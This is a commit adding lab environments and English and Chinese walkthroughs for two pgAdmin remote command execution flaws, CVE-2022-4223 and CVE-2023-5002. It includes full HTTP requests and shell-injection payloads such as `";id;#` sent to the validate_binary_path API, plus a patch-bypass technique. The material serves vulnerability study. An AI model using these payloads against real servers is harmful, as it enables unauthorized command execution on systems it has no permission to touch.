first commit

pgadmin/CVE-2022-4223/README.md

@@ -0,0 +1,65 @@
+# pgAdmin <= 6.16 Unauthenticated Remote Command Execution (CVE-2022-4223)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+pgAdmin is a popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
+
+The pgAdmin server includes an HTTP API that is intended to be used to validate the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. The utility is executed by the server to determine what PostgreSQL version it is from. Versions of pgAdmin prior to 6.17 failed to properly secure this API, which could allow an unauthenticated user to execute arbitrary commands on the server.
+
+References:
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
+- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
+- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
+
+## Vulnerable Environment
+
+Execute following command to start a pgAdmin 6.16 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:5050` to see the default login page of pgAdmin.
+
+## Exploit
+
+Before exploiting the vulnerability, send the following request to obtain the CSRF token:
+
+```
+GET /login HTTP/1.1
+Host: your-ip:5050
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+
+```
+
+Get the session id and csrf token from response:
+
+![](1.png)
+
+Then, fill the following request with the session id and csrf token and send it:
+
+```
+POST /misc/validate_binary_path HTTP/1.1
+Host: your-ip:5050
+Content-Length: 27
+X-pgA-CSRFToken: [csrf-token]
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Cookie: pga4_session=[session-id]
+Connection: close
+
+{"utility_path":"a\";id;#"}
+```
+
+As you can see, `id` command has been executed successful:
+
+![](2.png)

pgadmin/CVE-2022-4223/README.zh-cn.md

@@ -0,0 +1,63 @@
+# pgAdmin <= 6.16 无授权远程命令执行漏洞（CVE-2022-4223）
+
+pgAdmin是一个著名的PostgreSQL数据库管理平台。
+
+pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件，比如pg_dump和pg_restore。但在其6.16版本及以前，对于用户传入的路径没有做合适的验证，导致未授权的用户可以在目标服务器上执行任意命令。
+
+参考链接：
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
+- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
+- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
+
+## 漏洞环境
+
+执行如下命令启动一个pgAdmin 6.16服务器：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
+
+## 漏洞复现
+
+在复现漏洞前，需要发送如下数据包获取CSRF token：
+
+```
+GET /login HTTP/1.1
+Host: your-ip:5050
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+
+```
+
+在返回包中拿到一个新的session id和csrf token：
+
+![](1.png)
+
+然后，将获取到的session id和csrf token填写进下面的数据包并发送：
+
+```
+POST /misc/validate_binary_path HTTP/1.1
+Host: your-ip:5050
+Content-Length: 27
+X-pgA-CSRFToken: [csrf-token]
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Cookie: pga4_session=[session-id]
+Connection: close
+
+{"utility_path":"a\";id;#"}
+```
+
+可见，`id`命令已经被成功执行：
+
+![](2.png)

pgadmin/CVE-2022-4223/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/pgadmin:6.16
+   ports:
+    - "5050:5050"

pgadmin/CVE-2023-5002/README.md

@@ -0,0 +1,55 @@
+# pgAdmin <= 7.6 Authenticated Remote Command Execution (CVE-2023-5002)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+pgAdmin is a popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
+
+A flaw was found in pgAdmin. This issue occurs when the pgAdmin server HTTP API validates the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. Versions of pgAdmin prior to 7.7 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.
+
+References:
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/35f05e49b3632a0a674b9b36535a7fe2d93dd0c2>
+- <https://github.com/advisories/GHSA-ghp8-52vx-77j4>
+
+## Vulnerable Environment
+
+Execute following command to start a pgAdmin 7.6 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:5050` to see the default login page of pgAdmin.
+
+### Something we should know before exploiting the issue
+
+CVE-2023-5002 is a pathes bypass for previous issue [CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223). There are 2 updates from official patches:
+
+- Added `@login_required` to `validate_binary_path` function, not allowed unauthenticated user to access this API
+- Added `os.path.exists()` to check if the user provided parameter is a valid path
+
+Unfortunately, we can only bypass the second patch, so the CVE-2023-5002 is a authenticated vulerability.
+
+## Exploit
+
+Login the pgAdmin by username `vulhub@example.com` and password `vulhub`.
+
+Select "Tools -> Storage Manager" to open the filemanager dialog:
+
+![](1.png)
+
+Create a new folder which name is a crafted payload `";id;#`:
+
+![](2.png)
+
+Full path of this folder is `/var/lib/pgadmin/storage/vulhub_example.com/";id;#`, we will use this path to complete the exploitation.
+
+Go to "File -> Preferences" to open the setting dialog, open the "Paths -> Binary paths" panel.
+
+Fill the `/var/lib/pgadmin/storage/vulhub_example.com/";id;#` into any field of "PostgreSQL Binary Path" then click validate:
+
+![](3.png)
+
+As you can see, the `id` command is executed successful:
+
+![](4.png)

pgadmin/CVE-2023-5002/README.zh-cn.md

@@ -0,0 +1,51 @@
+# pgAdmin <= 7.6 后台远程命令执行漏洞（CVE-2023-5002）
+
+pgAdmin是一个著名的PostgreSQL数据库管理平台。
+
+pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件，比如pg_dump和pg_restore。在[CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223)中，这个API可被用于执行任意命令，官方对此进行了修复，但在7.6版本及以前修复并不完全，导致后台用户仍然可以执行任意命令。
+
+参考链接：
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/35f05e49b3632a0a674b9b36535a7fe2d93dd0c2>
+- <https://github.com/advisories/GHSA-ghp8-52vx-77j4>
+
+## 漏洞环境
+
+执行如下命令启动一个pgAdmin 7.6服务器：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
+
+### 一些值得注意的事情
+
+CVE-2023-5002是一个针对[CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223)漏洞的补丁绕过漏洞。官方发布了下面两个修复补丁修复漏洞：
+
+- 给`validate_binary_path`函数增加`@login_required`装饰器，限制未授权的用户访问相关接口
+- 使用`os.path.exists()`检查用户传入的路径是否有效
+
+不幸地是，只有第二个修复补丁可以被绕过，所以该漏洞仅是一个后台命令执行漏洞。
+
+## 漏洞复现
+
+使用帐号`vulhub@example.com`和密码`vulhub`登录pgAdmin。
+
+热爱后选择“Tools -> Storage Manager”打开文件管理器：
+
+![](1.png)
+
+创建一个新的目录，名字是我们的Payload `";id;#`：
+
+![](2.png)
+
+这个目录的完整路径是`/var/lib/pgadmin/storage/vulhub_example.com/";id;#`，我们后续就需要使用这个路径来利用漏洞。
+
+选择“File -> Preferences”打开设置页面，并来到“Paths -> Binary paths”面板。在任意一个“PostgreSQL Binary Path”文本框中填入`/var/lib/pgadmin/storage/vulhub_example.com/";id;#`，并点击右侧的“验证”按钮：
+
+![](3.png)
+
+可见，`id`命令被成功执行：
+
+![](4.png)

pgadmin/CVE-2023-5002/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/pgadmin:7.6
+   ports:
+    - "5050:5050"